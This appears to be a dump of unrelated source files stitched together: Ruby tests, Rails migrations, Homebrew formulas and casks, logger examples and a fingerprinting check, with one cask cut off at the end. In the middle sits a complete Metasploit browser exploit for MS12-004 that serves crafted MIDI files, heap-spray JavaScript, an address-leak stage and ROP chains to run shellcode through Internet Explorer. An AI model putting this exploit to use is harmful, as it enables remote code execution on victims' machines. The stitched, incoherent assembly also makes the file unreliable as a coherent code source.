let(:f) { Taxon.make!( rank: Taxon::FAMILY ) }
let(:g1) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:g2) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:s1) { Taxon.make!( rank: Taxon::SPECIES, parent: g1 ) }
describe "should set disagreement to false" do
it "when identification taxon becomes a descendant of the previous observation taxon" do
t = Taxon.make!( rank: Taxon::SPECIES, parent: g2 )
o = Observation.make!( taxon: g1 )
i = Identification.make!( taxon: t, observation: o )
expect( i.previous_observation_taxon ).to eq g1
expect( i ).to be_disagreement
without_delay { t.update_attributes( parent: g1 ) }
i.reload
expect( i ).not_to be_disagreement
end
it "when previous observation taxon becomes an ancestor of the identification taxon" do
t = Taxon.make!( rank: Taxon::GENUS, parent: f )
o = Observation.make!( taxon: t )
i = Identification.make!( taxon: s1, observation: o )
expect( i.previous_observation_taxon ).to eq t
expect( i ).to be_disagreement
without_delay { s1.update_attributes( parent: t ) }
i.reload
expect( i ).not_to be_disagreement
end
end
end
| 40.850733 | 144 | 0.690069 |
1c405885e26d2f212ca1a7d201bd12ed80e4e270 | 859 | # The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'rexml/xpath'
class Solr::Response::Ping < Solr::Response::Xml
def initialize(xml)
super
@ok = REXML::XPath.first(@doc, './solr/ping') ? true : false
end
# returns true or false depending on whether the ping
# was successful or not
def ok?
@ok
end
end
| 29.62069 | 74 | 0.725262 |
ab71fe767d2de37a7969fda3e22b55aa806446e0 | 705 | #!/usr/bin/ruby
# encoding: UTF-8
# require 'pyer/logger'
require './lib/pyer/logger.rb'
log = Logger.new(STRING, self.class)
log.debug 'StringIO'
log.close
print log.string
log = Logger.new(STDOUT, self.class)
log.debug 'debug'
log.info 'information'
log.info('what ?') { 'glop ' * 2 }
log.warn 'warning'
log.error 'error'
log.close
puts 'Formatter:'
f = Pyer::Formatter.new
puts f.string('KLASS', 'VOID')
puts f.string('KLASS', 'LABEL', 'message')
class Sample
def logging
log = Logger.new(STDOUT, self.class)
log.level = Logger::WARN
log.debug 'debug'
log.info 'information'
log.warn 'level is WARN'
log.error 'error'
log.close
end
end
s = Sample.new
s.logging
| 18.552632 | 42 | 0.670922 |
bb80a26bb0f34b7d4695a2f5060888a6a587eb9f | 102 | # frozen_string_literal: true
module ChatPreview
class ChatPreview < ApplicationComponent; end
end
| 17 | 47 | 0.823529 |
f7b9702c894959c24ac92405d3d345ae9b22f6e9 | 262 | class ChangeMatchsetsAndPicksSpec < ActiveRecord::Migration[5.0]
def change
add_column :matchsets, :name, :string
add_column :matchsets, :difficulty, :string
add_column :matchsets, :level, :string
remove_column :matchsets, :song_name
end
end
| 29.111111 | 64 | 0.744275 |
7901953a3d0b28337ef74cd2417aa8b81b46fb45 | 124 | json.extract! github_news_item, :id, :created_at, :updated_at
json.url github_news_item_url(github_news_item, format: :json) | 62 | 62 | 0.822581 |
385dda428d8fed5a32f636e1871bec9c1215c476 | 131 | require 'vcr'
VCR.configure do |c|
c.cassette_library_dir = 'spec/vcr'
c.hook_into :webmock
c.configure_rspec_metadata!
end
| 16.375 | 37 | 0.748092 |
334e45c66ecff069a21e20e871d6c090bad24ac2 | 18,659 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "MS12-004 midiOutPlayNextPolyEvent Heap Overflow",
'Description' => %q{
This module exploits a heap overflow vulnerability in the Windows Multimedia
Library (winmm.dll). The vulnerability occurs when parsing specially crafted
MIDI files. Remote code execution can be achieved by using the Windows Media Player
ActiveX control.
Exploitation is done by supplying a specially crafted MIDI file with
specific events, causing the offset calculation being higher than what is
available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing
us to either "inc al" or "dec al" a byte. This can be used to corrupt an array
(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
which leverages remote code execution under the context of the user.
Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,
if you know your target's patch level, you may also try the 'MSHTML' advanced
option for an info leak based attack. Currently, this module only supports two
MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.
Or 8.0.6001.19120, which is patch level before the MS12-004 fix.
Also, based on our testing, the vulnerability does not seem to trigger when
the victim machine is operated via rdesktop.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Shane Garrett', #Initial discovery (IBM X-Force)
'juan vazquez',
'sinn3r'
],
'References' =>
[
[ 'MSB', 'MS12-004'],
[ 'CVE', '2012-0003' ],
[ 'OSVDB', '78210'],
[ 'BID', '51292']
],
'Payload' =>
{
'Space' => 1024
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[
'IE 6 on Windows XP SP3',
{
'Rop' => false,
'DispatchDst' => 0x0c0c0c0c
}
],
[
'IE 7 on Windows XP SP3',
{
'Rop' => false,
'DispatchDst' => 0x0c0c0c0c
}
],
[
'IE 8 on Windows XP SP3',
{
# xchg ecx,esp
# or byte ptr [eax],al
# add byte ptr [edi+5Eh],bl
# ret 8
# From IMAGEHLP
'Rop' => true,
'StackPivot' => 0x76C9B4C2,
'DispatchDst' => 0x0c0c1bd0
}
]
],
'Privileged' => false,
'DisclosureDate' => '2012-01-10',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
register_advanced_options(
[
OptEnum.new('MSHTML',
[
false, "MSHTML Build Version", '',
[
'', #Default (no leaky leaky)
'8.0.6001.18702', #newly installed Win XP SP3 non patched
'8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011
]
])
])
end
def exploit
@m_name, @midi = get_midi
@ml_name, @midi_leak = get_midi("leak")
@second_stage_url = rand_text_alpha(10)
@leak_param = rand_text_alpha(5)
# Offset to CFunctionPointer vftable in MSHTML
case datastore['MSHTML']
when '8.0.6001.18702'
@offset = 0xbf190
when '8.0.6001.19120'
@offset = 0xd92c8
end
super
end
def get_target(request)
agent = request.headers['User-Agent']
print_status("Request as: #{agent}")
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP SP3 + IE 6.0
return targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP SP3 + IE 7.0
return targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP SP3 + IE 8.0
return targets[3]
else
return nil
end
end
# stage => "corruption" (default) | "leak"
def get_midi(stage="corruption")
# MIDI Fileformat Reference:
# http://www.sonicspot.com/guide/midifiles.html
#
# Event Types:
# 0x08 = Note Off (when MIDI key is released)
# 0x09 = Note On (when MIDI key is pressed)
# 0x0A = Note aftertouch (pressure change on the pressed MIDI key)
# 0x0B = Controller Event (MIDI channels state)
# 0x0C = Program change (Which instrument/patch should be played on the MIDI channel)
# 0x0D = Channel aftertouch (similar to Note Aftertouch; effects all keys pressed on the specific MIDI channel)
# 0x0E = Pitch Bend (similiar to a controller event; has 2 bytes to describe its value)
# 0x0F = Meta Events (not sent or received over a midi port)
# Structure:
# [Header Chunk][Track Chunk][Meta Event][Meta Event][SYSEX Event][Midi Channel Event)
# Track Chunk Data
tc = "\x00\xFF\x03\x0D\x44\x72\x75\x6D"
# Meta Event - Sequence/Track Name
tc << "\x73\x20\x20\x20\x28\x42\x42\x29\x00"
# Midi Channel Event - Program Change
tc << "\x00\xC9\x28"
# Midi Channel Event - Controller
tc << "\x00\xB9\x07\x64"
# Midi Channel Event - Controller
tc << "\x00\xB9\x0A\x40"
# Midi Channel Event - Controller
tc << "\x00\xB9\x7B\x00"
# Midi Channel Event - Controller
tc << "\x00\xB9\x5B\x28"
# Midi Channel Event - Controller
tc << "\x00\xB9\x5D\x00"
# Midi Channel Event - Note On
tc << "\x85\x50\x99\x23\x7F"
# Corruption events
if stage == "corruption"
# Midi Channel Event - Note On
tc << "\x00\x9F\xb2\x73"
else
# Midi Channel Event - Note Off (trigger a leak)
tc << "\x00\x8F\xb2\x73"
end
# Meta Event - End Of Track
tc << "\x00\xFF\x2F\x00"
m = ''
# HEADERCHUNK Header
m << "MThd" # Header
m << "\x00\x00\x00\x06" # Chunk size
m << "\x00\x00" # Format Type
m << "\x00\x01" # Number of tracks
m << "\x00\x60" # Time division
# TRACKCHUNK header
m << "MTrk" # Header
m << [tc.length].pack('N')
m << tc
#midi_name = "test_case.mid"
midi_name = rand_text_alpha(5) + ".mid"
return midi_name, m
end
def on_request_uri(cli, request)
# Initialize a target. If none suitable, then we don't continue.
my_target = target
if my_target.name =~ /Automatic/
my_target = get_target(request)
agent = request.headers['User-Agent']
if my_target.nil? and agent !~ /Windows\-Media\-Player|NSPlayer/
send_not_found(cli)
print_error("Unknown user-agent")
return
end
vprint_status("Target selected: #{my_target.name}") if not my_target.nil?
end
# Send the corrupt midi file to trigger a memory leak, or a crash to that points
# to an arbitrary address.
if request.uri =~ /#{@ml_name}$/i
print_status("Testing for info leak...")
send_response(cli, @midi_leak, {'Content-Type'=>'application/octet-strem'})
return
elsif request.uri =~ /#{@m_name}$/i
print_status("Sending midi corruption file...")
send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'})
return
end
# Send the appropriate stage
if datastore['MSHTML'].to_s != '' and my_target['Rop']
if request.uri =~ /#{@second_stage_url}/
leak = begin
request.uri_parts["QueryString"][@leak_param].to_i
rescue
0
end
print_status("Leaked address: 0x#{leak.to_s(16)}")
send_stage(cli, my_target, 'trigger', leak)
return
end
send_stage(cli, my_target, 'leak')
else
send_stage(cli, my_target)
end
end
def send_stage(cli, my_target, stage='trigger', leak=0)
midi_uri = get_resource.chomp("/")
if stage == 'leak'
midi_uri << "/#{@ml_name}"
trigger = build_trigger(my_target, "leak")
else
midi_uri << "/#{@m_name}"
trigger = build_trigger(my_target)
spray = build_spray(my_target, leak)
end
if datastore['OBFUSCATE']
spray = ::Rex::Exploitation::JSObfu.new(spray).obfuscate(memory_sensitive: true)
trigger = ::Rex::Exploitation::JSObfu.new(trigger)
trigger.obfuscate(memory_sensitive: true)
trigger_fn = trigger.sym('trigger')
else
trigger_fn = 'trigger'
end
html = %Q|
<html>
<head>
<script language='javascript'>
#{spray}
</script>
<script language='javascript'>
#{trigger}
</script>
<script for=audio event=PlayStateChange(oldState,newState)>
if (oldState == 3 && newState == 0) {
#{trigger_fn}();
}
</script>
</head>
<body>
<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
<param name="fileName" value="#{midi_uri}">
<param name="SendPlayStateChangeEvents" value="true">
<param NAME="AutoStart" value="True">
<param name="uiMode" value="mini">
<param name="Volume" value="-300">
</object>
</body>
</html>
|
html = html.gsub(/^ {4}/, '')
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def build_spray(my_target, leak=0)
# Extract string based on target
if my_target.name == 'IE 8 on Windows XP SP3'
js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
else
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
end
# Build shellcode based on Rop requirement
code = ''
if my_target['Rop'] and datastore['MSHTML'].to_s != ''
print_status("Generating ROP using info-leak: 0x#{leak.to_s(16)}")
code << create_info_leak_rop(my_target, leak)
code << payload.encoded
elsif my_target['Rop'] and datastore['MSHTML'].to_s == ''
print_status("Generating ROP using msvcrt")
code << create_rop(my_target, payload.encoded)
else
code << payload.encoded
end
shellcode = Rex::Text.to_unescape(code)
randnop = rand_text_alpha(rand(100) + 1)
js_nops = Rex::Text.to_unescape("\x0c"*4)
# 1. Create big block of nops
# 2. Compose one block which is nops + shellcode
# 3. Repeat the block
# 4. Extract string from the big block
# 5. Spray
spray = <<-JS
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{shellcode}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x1000) nops+= nops;
var shellcode = nops.substring(0,0x800 - code.length) + code;
while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str}
heap_obj.gc();
for (var i=0; i < 600; i++) {
heap_obj.alloc(block);
}
JS
spray = heaplib(spray, {:noobfu => true})
return spray
end
# Build the JavaScript string for the attributes
# type => "corruption" (default) | "leak"
def build_element(element_name, my_target, type="corruption")
dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V"))
element = ''
if my_target.name =~ /IE 8/
max = 63 # Number of attributes for IE 8
index = 1 # Where we want to confuse the type
else
max = 55 # Number of attributes for before IE 8
index = 0 # Where we want to confuse the type
end
element << "var #{element_name} = document.createElement(\"select\")" + "\n"
# Build attributes
0.upto(max) do |i|
case type
when "corruption"
obj = (i==index) ? "unescape(\"#{dst}\")" : "alert"
else #leak
obj = "alert"
end
element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n"
end
return element
end
# Feng Shui and triggering Steps:
# 1. Run the garbage collector before allocations
# 2. Defragment the heap and alloc CImplAry objects in one step (objects size are IE version dependent)
# 3. Make holes
# 4. Let windows media play the crafted midi file and corrupt the heap
# 5. Force the using of the confused tagVARIANT.
def build_trigger(my_target, type="corruption")
js_trigger = build_trigger_fn(my_target, type)
select_element = build_element('selob', my_target, type)
trigger = <<-JS
var heap = new heapLib.ie();
#{select_element}
var clones = new Array(1000);
function feng_shui() {
heap.gc();
var i = 0;
while (i < 1000) {
clones[i] = selob.cloneNode(true)
i = i + 1;
}
var j = 0;
while (j < 1000) {
delete clones[j];
CollectGarbage();
j = j + 2;
}
}
feng_shui();
#{js_trigger}
JS
trigger = heaplib(trigger, {:noobfu => true})
return trigger
end
# type = "corruption" (default) | "leak"
def build_trigger_fn(my_target, type="corruption")
js_trigger=""
case type
when "corruption"
js_trigger = js_trigger_fn_corruption(my_target)
when "leak"
js_trigger = js_trigger_fn_leak(my_target)
end
return js_trigger
end
# Redoing the feng shui if fails makes it reliable
def js_trigger_fn_corruption(my_target)
attribute = (my_target.name == 'IE 8 on Windows XP SP3') ? 'w1' : 'w0'
js = %Q|
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].#{attribute}) == "string") {
} else {
clones[k].#{attribute}('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
|
return js
end
# Redoing the feng shui if fails makes it reliable
def js_trigger_fn_leak(my_target)
js_trigger = ""
if my_target.name == 'IE 8 on Windows XP SP3'
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
return;
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
end
return js_trigger
end
def create_rop(t, p)
# MSVCRT.dll ROP
padding = ''
padding << [0x77C4CA70].pack("V*") #ADD ESP,0C; RET
padding << [t['StackPivot']].pack("V*")
padding << [0x77C4CA73].pack("V*") * 12 #ROP NOPs
generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
end
def create_info_leak_rop(my_target, leak = 0x0)
base = (leak == 0x00) ? 0x63580000 : (leak - @offset)
print_status("Image base of mshtml: 0x%x" %base)
# Generate the gadgets based on offset
rop_gadgets = ''
case @offset
when 0xd92c8
rop_gadgets =
[
:junk,
:junk,
0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
:junk,
0x247e5d, # ROP NOPs
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5c, # POP ESI # RETN [mshtml.dll]
0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll]
0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll]
:junk,
0x3460c, # POP EBP # RETN [mshtml.dll]
:junk,
:junk,
0x23ef79, # & jmp esp [mshtml.dll]
0x189303, # POP EBX # RETN [mshtml.dll]
:ebx, # 0x00000201-> ebx
0x20437c, # POP EDX # RETN [mshtml.dll]
:edx, # 0x00000040-> edx
0xc277, # POP ECX # RETN [mshtml.dll]
0x53a47d, # &Writable location [mshtml.dll]
0x4a33e2, # POP EDI # RETN [mshtml.dll]
0x4b601, # RETN (ROP NOP) [mshtml.dll]
0x33fbc6, # POP EAX # RETN [mshtml.dll]
:nop,
0x52c718 # PUSHAD # RETN [mshtml.dll]
]
when 0xbf190
rop_gadgets =
[
:junk,
0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
:junk,
0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7
:junk,
:junk,
:junk,
:junk,
:junk,
0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
0x3dc745, # POP ESI # RETN [mshtml.dll]
:neg, # 0xffffffff
0x2fb18b, # INC ESI # RETN [mshtml.dll]
0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
0x4aada7, # POP EBP # RETN [mshtml.dll]
:junk, # Compensates RETN
:junk, # Compensates RETN
0x1ffc54, # & jmp esp [mshtml.dll]
0x4498a7, # POP EBX # RETN [mshtml.dll]
:ebx, # 0x00000800: 0x00000201-> ebx
0x24cce4, # POP EDX # RETN [mshtml.dll]
:edx, # 0x00000040-> edx
0x158306, # POP ECX # RETN [mshtml.dll]
0x535098, # &Writable location [mshtml.dll]
0x1cf217, # POP EDI # RETN [mshtml.dll]
0xa0001, # RETN (ROP NOP) [mshtml.dll]
0x349f9b, # POP EAX # RETN [mshtml.dll]
:nop,
0x2afbe8 # PUSHAD # RETN [mshtml.dll]
]
end
nops = make_nops(4).unpack("L")[0].to_i
rop_gadgets.map! { |e|
if e == :junk
rand_text(4).unpack("L")[0].to_i
elsif e == :neg
0xffffffff
elsif e == :ebx
0x00000800
elsif e == :edx
0x00000040
elsif e == :nop
nops
else
base + e
end
}
chain = rop_gadgets.pack('V*')
return chain
end
end
| 30.588525 | 115 | 0.567072 |
088d302304863883b30858d2c767ea1d06e26d2c | 244 | require 'test_helper'
class RoutesTest < ActionDispatch::IntegrationTest
# why does this not work?
# test "pages routes" do
# assert_recognizes({:controller => "static_pages/pages", :action => "show"}, {:path => "test"})
# end
end
| 22.181818 | 100 | 0.67623 |
0871e2e917dae76dd8a9c81606ea83544aa81b4e | 354 | class FontEuphoriaScript < Formula
head "https://github.com/google/fonts/raw/main/ofl/euphoriascript/EuphoriaScript-Regular.ttf", verified: "github.com/google/fonts/"
desc "Euphoria Script"
homepage "https://fonts.google.com/specimen/Euphoria+Script"
def install
(share/"fonts").install "EuphoriaScript-Regular.ttf"
end
test do
end
end
| 32.181818 | 133 | 0.757062 |
6108bda083d0c2d22c8282a962dcdd4fd6758d07 | 1,065 | class AddProducts < ActiveRecord::Migration[6.0]
def change
Product.create ({ :title => "Salons",
:description => "This is Hawaiian pizza",
:price => 350, :size => 30,
:is_spicy => false,
:is_veg => false,
:is_best_offer => false,
:path_to_image => '/images/par.jpg' })
Product.create ({ :title => "Individuals",
:description => "This is Pepperoni pizza",
:price => 450, :size => 30,
:is_spicy => false,
:is_best_offer => false,
:is_veg => false,
:path_to_image => '/images/s.jpg' })
Product.create ({ :title => "The map",
:description => "This is Vegeterian pizza",
:price => 400, :size => 30,
:is_spicy => false,
:is_veg => true ,
:is_best_offer => false,
:path_to_image => '/images/map.jpg' })
end
end
| 38.035714 | 62 | 0.435681 |
5d79ae48342b467fd661121ee15c0c7c1d7c2679 | 680 | module Intrigue
module Ident
module Check
class Cerberus < Intrigue::Ident::Check::Base
def generate_checks(url)
[
{
:type => "fingerprint",
:category => "application",
:tags => ["Web Server"],
:vendor => "Cradlepoint",
:product =>"HTTP Service",
:match_details =>"server header",
:version => nil,
:match_type => :content_headers,
:match_content => /^server:.*Cerberus.*$/,
:dynamic_version => lambda{ |x|
_first_header_capture(x,/^server:.*Cerberus\/([\d\.]*)\s.*$/i)
},
:paths => ["#{url}"],
:inference => true
}
]
end
end
end
end
end
| 21.935484 | 73 | 0.526471 |
bb780ae254fed522923abc2e53d5a7e7a7fddcf9 | 3,400 | class Tinyxml < Formula
desc "XML parser"
homepage "http://www.grinninglizard.com/tinyxml/"
url "https://downloads.sourceforge.net/project/tinyxml/tinyxml/2.6.2/tinyxml_2_6_2.tar.gz"
sha256 "15bdfdcec58a7da30adc87ac2b078e4417dbe5392f3afb719f9ba6d062645593"
revision 1 unless OS.mac?
bottle do
sha256 cellar: :any, arm64_big_sur: "04fccb4076db86eb901b710f5d50b01ea6e6cec907979aed5eb5135c9654e16d"
sha256 cellar: :any, big_sur: "e98aaca0d889c322b5e2294495e7613e656773fb5f605a6239d8b85949011b99"
sha256 cellar: :any, catalina: "7cc1ada5d273bec9f50a1809a9989306ec9601a037c06b362cee321fbdc5c0a7"
sha256 cellar: :any, mojave: "c1fc1d7fa9e6934412294e921cde90bcfd107b68dbdddd9acf8cae4927190718"
sha256 cellar: :any, high_sierra: "ec0f83018a9ff93c11b6a8c92483056b2771359a14aedfb6dc46e1ab078ce9ac"
sha256 cellar: :any, sierra: "ef8c7bbbae6148e161b6f3369ede8bd3533a32847dc716000b46d26e6fb1c26c"
sha256 cellar: :any, el_capitan: "16e6052892b43e68c45f5122b6802e9bc32001dc9478dfcd89511a24544660e5"
sha256 cellar: :any, yosemite: "4b1df9cb229b04f9968621a52737d96e86fcd6c2ad8904ae8a5c324347845f50"
sha256 cellar: :any, x86_64_linux: "58b44f9ef1275fa22bd9d907a2f4bb59d8de971ff514664c3e7157ebc4ac944d" # linuxbrew-core
end
depends_on "cmake" => :build
# The first two patches are taken from the debian packaging of tinyxml.
# The first patch enforces use of stl strings, rather than a custom string type.
# The second patch is a fix for incorrect encoding of elements with special characters
# originally posted at https://sourceforge.net/p/tinyxml/patches/51/
# The third patch adds a CMakeLists.txt file to build a shared library and provide an install target
# submitted upstream as https://sourceforge.net/p/tinyxml/patches/66/
patch do
url "https://raw.githubusercontent.com/robotology/yarp/59eedfbaa1069aa5f03a4a9980d984d59decd55c/extern/tinyxml/patches/enforce-use-stl.patch"
sha256 "16a5b5e842eb0336be606131e5fb12a9165970f7bd943780ba09df2e1e8b29b1"
end
patch do
url "https://raw.githubusercontent.com/robotology/yarp/59eedfbaa1069aa5f03a4a9980d984d59decd55c/extern/tinyxml/patches/entity-encoding.patch"
sha256 "c5128e03933cd2e22eb85554d58f615f4dbc9177bd144cae2913c0bd7b140c2b"
end
patch do
url "https://gist.githubusercontent.com/scpeters/6325123/raw/cfb079be67997cb19a1aee60449714a1dedefed5/tinyxml_CMakeLists.patch"
sha256 "32160135c27dc9fb7f7b8fb6cf0bf875a727861db9a07cf44535d39770b1e3c7"
end
def install
system "cmake", ".", *std_cmake_args
system "make", "install"
(lib+"pkgconfig/tinyxml.pc").write pc_file
end
def pc_file
<<~EOS
prefix=#{opt_prefix}
exec_prefix=${prefix}
libdir=${exec_prefix}/lib
includedir=${prefix}/include
Name: TinyXml
Description: Simple, small, C++ XML parser
Version: #{version}
Libs: -L${libdir} -ltinyxml
Cflags: -I${includedir}
EOS
end
test do
(testpath/"test.xml").write <<~EOS
<?xml version="1.0" ?>
<Hello>World</Hello>
EOS
(testpath/"test.cpp").write <<~EOS
#include <tinyxml.h>
int main()
{
TiXmlDocument doc ("test.xml");
doc.LoadFile();
return 0;
}
EOS
system ENV.cxx, "test.cpp", "-L#{lib}", "-ltinyxml", "-o", "test"
system "./test"
end
end
| 40.963855 | 145 | 0.743235 |
ed144935bf64a6235219772f2850f605c30ed22c | 196 | class AddAuthenticationTokenToUsers < ActiveRecord::Migration[5.0]
def change
add_column :users, :auth_token, :string, default: ''
add_index :users, :auth_token, unique: true
end
end
| 28 | 66 | 0.734694 |
4a9394563536f0df7a00952ec6472096e3934df6 | 1,557 | class Mednafen < Formula
desc "Multi-system emulator"
homepage "https://mednafen.github.io/"
url "https://mednafen.github.io/releases/files/mednafen-1.27.1.tar.xz"
sha256 "f3a89b2f32f40c3232593808d05e0c21cbdf443688ace04c9c27e4cf4d5955fb"
license "GPL-2.0-or-later"
livecheck do
url "https://mednafen.github.io/releases/"
regex(/href=.*?mednafen[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
sha256 arm64_big_sur: "89eb1006849d1d949b425d2937a7ca6e00c703a1edae563075dba88ccc817a0c"
sha256 big_sur: "5d671db565de9ce937475c19880caf88d38faa2b2b8a42888230a0be27f32615"
sha256 catalina: "beda51be33761b5b9e9764093e313b567d1b1bcd58aab91a64d3f7a4099d2c93"
sha256 mojave: "62500c988c009c14e45f80de2f69d3b9a352946a36888adfe94b4eda14e6fc9f"
sha256 x86_64_linux: "9385785347f0e28b221bc0d8dc0a6afbcab5eeda7664bbfc749cbafc8a8d75b6"
end
depends_on "pkg-config" => :build
depends_on "gettext"
depends_on "libsndfile"
depends_on macos: :sierra # needs clock_gettime
depends_on "sdl2"
uses_from_macos "zlib"
on_linux do
depends_on "mesa"
depends_on "mesa-glu"
end
def install
system "./configure", "--prefix=#{prefix}", "--disable-dependency-tracking"
system "make", "install"
end
test do
# Test fails on headless CI: Could not initialize SDL: No available video device
on_linux do
return if ENV["HOMEBREW_GITHUB_ACTIONS"]
end
cmd = "#{bin}/mednafen | head -n1 | grep -o '[0-9].*'"
assert_equal version.to_s, shell_output(cmd).chomp
end
end
| 31.77551 | 92 | 0.734104 |
6ad19888d59bbc832bfd4c16e6592348080ac8de | 2,767 | require 'test_helper'
class TwoPoolToSemiGenerationTest < ActionDispatch::IntegrationTest
def setup
create_pool_tournament_single_weight(8)
end
test "Match generation works" do
assert @tournament.matches.count == 16
assert @tournament.matches.select{|m| m.bracket_position == "Semis"}.count == 2
assert @tournament.matches.select{|m| m.bracket_position == "1/2"}.count == 1
assert @tournament.matches.select{|m| m.bracket_position == "3/4"}.count == 1
assert @tournament.matches.select{|m| m.bracket_position == "Pool"}.count == 12
assert @tournament.weights.first.pools == 2
end
test "Seeded wrestlers go to correct pool" do
guy1 = get_wrestler_by_name("Test1")
guy2 = get_wrestler_by_name("Test2")
guy3 = get_wrestler_by_name("Test3")
guy4 = get_wrestler_by_name("Test4")
guy5 = get_wrestler_by_name("Test5")
guy6 = get_wrestler_by_name("Test6")
guy7 = get_wrestler_by_name("Test7")
guy8 = get_wrestler_by_name("Test8")
assert guy1.pool == 1
assert guy2.pool == 2
assert guy3.pool == 2
assert guy4.pool == 1
end
test "Loser names set up correctly" do
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 1}.first.loser1_name == "Winner Pool 1"
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 1}.first.loser2_name == "Runner Up Pool 2"
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 2}.first.loser1_name == "Winner Pool 2"
assert @tournament.matches.select{|m| m.bracket_position == "Semis" && m.bracket_position_number == 2}.first.loser2_name == "Runner Up Pool 1"
thirdFourth = @tournament.matches.reload.select{|m| m.bracket_position == "3/4"}.first
semis = @tournament.matches.reload.select{|m| m.bracket_position == "Semis"}
assert thirdFourth.loser1_name == "Loser of #{semis.select{|m| m.bracket_position_number == 1}.first.bout_number}"
assert thirdFourth.loser2_name == "Loser of #{semis.select{|m| m.bracket_position_number == 2}.first.bout_number}"
end
test "Each wrestler has two pool matches" do
@tournament.wrestlers.each do |wrestler|
assert wrestler.pool_matches.size == 3
end
end
test "Placement points are given when moving through bracket" do
match = @tournament.matches.select{|m| m.bracket_position == "Semis"}.first
wrestler = get_wrestler_by_name("Test1")
match.w1 = wrestler.id
match.save
assert wrestler.reload.placement_points == 4
end
test "Run through all matches works" do
@tournament.matches.sort{ |match| match.round }.each do |match|
match.winner_id = match.w1
match.save
end
end
end
| 43.234375 | 146 | 0.707626 |
bf459bdadc15fd755fad9308763195297ebf7444 | 293 | # Be sure to restart your server when you modify this file.
# Configure sensitive parameters which will be filtered from the log file.
Rails.application.config.filter_parameters += [
:passw, :secret, :token, :_key, :crypt, :salt, :certificate, :otp, :ssn, :password, :otp_attempt, :photo
]
| 41.857143 | 106 | 0.737201 |
ffaeef5b1b838540f13e45b2a9e664b10210b797 | 366 | cask 'obinslab-starter' do
version '1.0.10'
sha256 '5aa810df804d18ae4ecdf3a049596164d2af76f518b83476d943f4e186c8b4e2'
url "http://releases.obins.net/occ/darwin/x64/ObinslabStarter_#{version}_x64.dmg"
appcast 'http://en.obins.net/obinslab-starter'
name 'Obinslab Starter'
homepage 'http://en.obins.net/obinslab-starter'
app 'Obinslab Starter.app'
end
| 30.5 | 83 | 0.773224 |
38f2a9dc3380c2a906f9e957448f351bc753d8eb | 772 | cask "imgotv" do
version "6.4.6_1"
sha256 "af68f7ec41444eb274ce7bc4d8e2c6b39b36f2d20b8299d507b0a3cd41e1b967"
url "https://download.imgo.tv/app/mac/#{version}/mgtv-mango.dmg",
verified: "download.imgo.tv/"
